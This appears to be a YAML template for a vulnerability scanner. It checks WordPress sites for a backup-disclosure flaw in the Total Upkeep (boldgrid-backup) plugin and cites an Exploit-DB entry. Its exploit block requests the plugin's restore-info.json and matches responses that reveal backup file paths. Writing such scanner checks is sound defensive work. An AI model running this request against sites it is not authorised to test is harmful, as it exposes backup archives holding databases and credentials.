product: WordPress
vName: WordPress Total Upkeep Database and Files Backup Download
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/49252
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/boldgrid-backup/cron/restore-info.json
    verify:
      logic: and
      check:
        - header:
            value:
              - application/json
            logic: and
        - body:
            value:
              - '"filepath"'
              - /wp-content/boldgrid_backup_
            logic: and
        - status: 200
